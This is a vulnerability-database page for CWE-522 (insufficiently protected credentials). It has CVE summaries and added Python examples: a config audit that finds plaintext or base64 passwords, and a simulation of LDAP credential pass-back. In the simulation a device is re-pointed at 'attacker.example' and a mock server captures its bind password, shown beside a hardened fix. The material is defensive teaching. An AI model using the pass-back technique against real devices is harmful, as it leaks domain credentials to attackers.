VYPR

CWE-522

Insufficiently Protected Credentials

Abstraction: Class · Status: Incomplete

Description

The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.
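Two of the storage variants that recur in the mapped CVEs below are credentials kept in cleartext in a config file and credentials "protected" only by base64, which is reversible by anyone who can read the file. The following is an added example, not part of the CWE entry or any listed product's code: an audit that classifies credential-like elements in an XML config as plaintext, base64-encoded plaintext, or a salted verifier, next to the scrypt store/verify pair that is the right shape for a password the product only has to check. The element-name regex, the sample config and the `scrypt$` format are constructed assumptions.

```python
import base64
import binascii
import hashlib
import hmac
import os
import re
import xml.etree.ElementTree as ET

# Element names that usually carry a secret (assumption; real configs vary).
CREDENTIAL_TAG = re.compile(r"pass(word|wd)?|secret|api.?key", re.I)

SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, dklen=32)  # ~16 MiB per hash


def store_password(password: str, salt: bytes = b"") -> str:
    """Salted scrypt verifier for a password the product only needs to check.
    Format (our own convention): scrypt$<salt b64>$<digest b64>."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return "scrypt$%s$%s" % (base64.b64encode(salt).decode(),
                             base64.b64encode(digest).decode())


def verify_password(password: str, stored: str) -> bool:
    """Recompute and compare in constant time against a store_password value."""
    algo, salt_b64, digest_b64 = stored.split("$")
    if algo != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode(), salt=base64.b64decode(salt_b64),
                            **SCRYPT_PARAMS)
    return hmac.compare_digest(digest, base64.b64decode(digest_b64))


def decodes_to_text(value: str) -> bool:
    """True when value is base64 whose payload is printable ASCII, i.e. encoding
    used in place of encryption: no key is needed to get the secret back."""
    if len(value) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return False
    try:
        payload = base64.b64decode(value, validate=True)
    except binascii.Error:
        return False
    return bool(payload) and all(32 <= b < 127 for b in payload)


def audit_credentials(xml_text: str) -> list:
    """Classify each credential-like element as 'plaintext',
    'base64-encoded plaintext' or 'hashed'. Everything except 'hashed' is a
    CWE-522 finding wherever local users can read the file. Service credentials
    that must be replayed (e.g. a directory bind) cannot be hashed; they need
    encryption under a key held outside the file, which base64 is not."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        value = (elem.text or "").strip()
        if not CREDENTIAL_TAG.search(elem.tag) or not value:
            continue
        if value.startswith("scrypt$"):
            kind = "hashed"
        elif decodes_to_text(value):
            kind = "base64-encoded plaintext"
        else:
            kind = "plaintext"
        findings.append((elem.tag, kind))
    return findings


# Constructed sample, not any vendor's file. "UHJpbnQhMjAxOA==" is merely
# base64 for "Print!2018": the bind password is fully recoverable.
SAMPLE_CONFIG = f"""<config>
  <ldap>
    <bindUser>CORP\\svc-print</bindUser>
    <bindPassword>UHJpbnQhMjAxOA==</bindPassword>
  </ldap>
  <web>
    <adminPassword>hunter2</adminPassword>
    <operatorPassword>{store_password('correct horse')}</operatorPassword>
  </web>
</config>
"""

if __name__ == "__main__":
    for tag, kind in audit_credentials(SAMPLE_CONFIG):
        print(f"{tag}: {kind}")
```

Run as a script it prints one line per credential element of the sample; the two non-hashed ones are the findings. The audit is a triage aid, not proof of absence: a secret under an unusual element name, or one stored outside XML, is not caught by it.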

Hierarchy (View 1000)

Related attack patterns (CAPEC)

CAPEC-102 · CAPEC-474 · CAPEC-50 · CAPEC-509 · CAPEC-551 · CAPEC-555 · CAPEC-560 · CAPEC-561 · CAPEC-600 · CAPEC-644 · CAPEC-645 · CAPEC-652 · CAPEC-653

CVEs mapped to this weakness (561)

page 9 of 29
  • CVE-2018-10355 · High · May 23, 2018
    risk 0.46 · cvss 7.0 · epss 0.01

    An authentication weakness vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to recover user passwords on vulnerable installations due to a flaw in the DBCrypto class. An attacker must first obtain access to the user database on the target system…

  • CVE-2018-10327 · High · May 17, 2018
    risk 0.46 · cvss 7.0 · epss 0.00

    PrinterOn Enterprise 4.1.3 stores the Active Directory bind credentials using base64 encoding, which allows local users to obtain credentials for a domain user by reading the cps_config.xml file.

  • CVE-2017-1764 · High · Apr 23, 2018
    risk 0.46 · cvss 7.0 · epss 0.00

    IBM Cognos Business Intelligence 10.2, 10.2.1, 10.2.1.1, and 10.2.2, under specialized circumstances, could expose plain text credentials to a local user. IBM X-Force ID: 136149.

  • CVE-2025-12461 · Medium · Oct 29, 2025
    risk 0.45 · cvss n/a · epss 0.00

    This vulnerability allows an attacker to access parts of the application that are not protected by any type of access control. The attacker could access this path ‘…/epsilonnet/License/About.aspx’ and obtain information on both the licence and the configuration of the…

  • CVE-2025-10360 · Medium · Sep 24, 2025
    risk 0.45 · cvss n/a · epss 0.00

    In Puppet Enterprise versions 2025.4.0 and 2025.5, the encryption key used for encrypting content in the Infra Assistant database was not excluded from the files gathered by Puppet backup. The key is only present on the system if the user has a Puppet Enterprise Advanced license…

  • CVE-2025-6081 · Medium · Jul 1, 2025
    risk 0.44 · cvss 6.8 · epss 0.00

    Insufficiently Protected Credentials in LDAP in Konica Minolta bizhub 227 Multifunction printers version GCQ-Y3 or earlier allows an attacker to reconfigure the target device to use an external LDAP service controlled by the attacker. If an LDAP password is set on the target…

  • CVE-2024-51984 · Medium · Jun 25, 2025
    risk 0.44 · cvss 6.8 · epss 0.01

    An authenticated attacker can reconfigure the target device to use an external service (such as LDAP or FTP) controlled by the attacker. If an existing password is present for an external service, the attacker can force the target device to authenticate to an attacker controlled…

  • CVE-2024-44754 · Medium · Feb 28, 2025
    risk 0.44 · cvss 6.8 · epss 0.00

    Cryptographic key extraction from internal flash in Minut M2 with firmware version #15142 allows physically proximate attackers to inject modified firmware into any other Minut M2 product via USB.

  • CVE-2017-5704 · Medium · Jul 10, 2018
    risk 0.44 · cvss 6.7 · epss 0.00

    Platform sample code firmware included with 4th Gen Intel Core Processor, 5th Gen Intel Core Processor, 6th Gen Intel Core Processor, and 7th Gen Intel Core Processor potentially exposes password information in memory to a local attacker with administrative privileges.

  • CVE-2018-1000404 · High · Jul 9, 2018
    risk 0.44 · cvss 7.8 · epss 0.00

    Jenkins project Jenkins AWS CodeBuild Plugin version 0.26 and earlier contains an Insufficiently Protected Credentials vulnerability in AWSClientFactory.java, CodeBuilder.java that can result in Credentials Disclosure. This attack appears to be exploitable via local file access.…

  • CVE-2018-1000401 · High · Jul 9, 2018
    risk 0.44 · cvss 7.8 · epss 0.00

    Jenkins project Jenkins AWS CodePipeline Plugin version 0.36 and earlier contains an Insufficiently Protected Credentials vulnerability in AWSCodePipelineSCM.java that can result in Credentials Disclosure. This attack appears to be exploitable via local file access. This…

  • CVE-2018-12260 · Medium · Jun 12, 2018
    risk 0.44 · cvss 6.7 · epss 0.00

    An issue was discovered on Momentum Axel 720P 5.1.8 devices. The root password can be obtained in cleartext by issuing the command 'showKey' from the root CLI. This password may be the same on all devices.

  • CVE-2018-1000104 · High · Mar 13, 2018
    risk 0.44 · cvss 7.8 · epss 0.00

    A plaintext storage of a password vulnerability exists in Jenkins Coverity Plugin 1.10.0 and earlier in CIMInstance.java that allows an attacker with local file system access or control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the…

  • CVE-2017-9969 · Medium · Feb 12, 2018
    risk 0.44 · cvss 6.7 · epss 0.00

    An information disclosure vulnerability exists in Schneider Electric's IGSS Mobile application version 3.01 and prior. Passwords are stored in clear text in the configuration which can result in exposure of sensitive information.

  • CVE-2017-8371 · Medium · Apr 30, 2017
    risk 0.44 · cvss 6.8 · epss 0.01

    Schneider Electric StruxureWare Data Center Expert before 7.4.0 uses cleartext RAM storage for passwords, which might allow remote attackers to obtain sensitive information via unspecified vectors.

  • CVE-2016-9360 · Medium · Feb 13, 2017
    risk 0.44 · cvss 6.7 · epss 0.00

    An issue was discovered in General Electric (GE) Proficy HMI/SCADA iFIX Version 5.8 SIM 13 and prior versions, Proficy HMI/SCADA CIMPLICITY Version 9.0 and prior versions, and Proficy Historian Version 6.0 and prior versions. An attacker may be able to retrieve user passwords if…

  • CVE-2026-39908 · Medium · Jun 8, 2026
    risk 0.42 · cvss 6.5 · epss 0.00

    OpenBullet2 through version 0.3.2 on Windows contains a credential disclosure vulnerability that allows remote attackers to capture the NTLMv2 hash of the process user by configuring a job proxy source with a UNC path pointing to an attacker-controlled server. When the job…

  • CVE-2026-49379 · Medium · May 29, 2026
    risk 0.42 · cvss 6.5 · epss 0.00

    In JetBrains TeamCity before 2026.1, credentials could be exposed in thread names.

  • CVE-2026-0393 · Medium · May 21, 2026
    risk 0.42 · cvss 6.5 · epss 0.00

    The affected product may expose credentials remotely between low privileged visualization users during concurrent login operations due to insufficient isolation of authentication data. The vulnerability affects only login operations within an active visualization session.

  • CVE-2026-42367 · Medium · May 4, 2026
    risk 0.42 · cvss 6.5 · epss 0.00

    A privilege escalation vulnerability exists in the Web Interface / ssi.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted HTTP request can lead to a credentials leak. An attacker can visit a webpage to trigger this vulnerability.
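The Konica Minolta bizhub entry (CVE-2025-6081) and CVE-2024-51984 describe the same transmission-side pattern, often called credential pass-back: the device keeps a stored bind secret across a settings change, so whoever can edit the LDAP (or FTP) server address and trigger a connection test has the device deliver that secret to a host they control. The following is an added illustration, not the vendors' firmware or any project's code: a settings handler in the vulnerable shape beside one that discards the stored secret whenever the destination changes and refuses a bind without TLS. The class and field names, the directory DN and the scenario are all constructed.

```python
from dataclasses import dataclass


@dataclass
class LdapSettings:
    host: str
    port: int = 636
    use_tls: bool = True
    bind_dn: str = ""
    bind_password: str = ""  # secret the device presents when it binds


class VulnerableLdapConfig:
    """Keeps the stored bind password across any edit: change 'host', press
    "test connection", and the secret arrives at the new host."""

    def __init__(self, settings: LdapSettings):
        self.settings = settings

    def update(self, **changes):
        for name, value in changes.items():
            setattr(self.settings, name, value)

    def test_connection(self, connect):
        s = self.settings
        return connect(s.host, s.port, s.use_tls, s.bind_dn, s.bind_password)


class HardenedLdapConfig(VulnerableLdapConfig):
    """Any change to where the bind goes invalidates the stored secret, and a
    cleartext (non-TLS) destination is refused outright."""

    DESTINATION_FIELDS = {"host", "port", "use_tls"}

    def update(self, **changes):
        if not changes.get("use_tls", self.settings.use_tls):
            raise ValueError("simple bind without TLS would send the password in clear")
        if self.DESTINATION_FIELDS.intersection(changes) and "bind_password" not in changes:
            # Operator must re-enter the password for the new server; the old
            # secret is never presented anywhere it was not entered for.
            self.settings.bind_password = ""
        super().update(**changes)

    def test_connection(self, connect):
        if not self.settings.bind_password:
            return False  # nothing stored, nothing to leak; the UI should prompt
        return super().test_connection(connect)


def simulate_passback(config_cls):
    """Constructed scenario: the device is already bound to the corporate
    directory; an authenticated attacker re-points it at a host they run and
    triggers a test bind. Returns (test result, what the attacker's host saw)."""
    captured = []

    def attacker_ldap(host, port, use_tls, bind_dn, bind_password):
        captured.append((host, bind_dn, bind_password))  # a rogue server just logs the bind
        return True

    settings = LdapSettings(host="ldap.corp.example",
                            bind_dn="cn=svc-print,ou=svc,dc=corp,dc=example",
                            bind_password="S3cret!")
    cfg = config_cls(settings)
    cfg.update(host="attacker.example")  # only the destination changes
    return cfg.test_connection(attacker_ldap), captured


if __name__ == "__main__":
    print("vulnerable:", simulate_passback(VulnerableLdapConfig))
    print("hardened:  ", simulate_passback(HardenedLdapConfig))
```

Against the vulnerable handler the simulated attacker host records the bind DN and password; against the hardened one the test bind returns False and nothing is sent. The same rule belongs on every outbound integration that stores a secret (SMTP, FTP, SMB, proxies), and the stored value must also never be echoed back in the settings page or its API response.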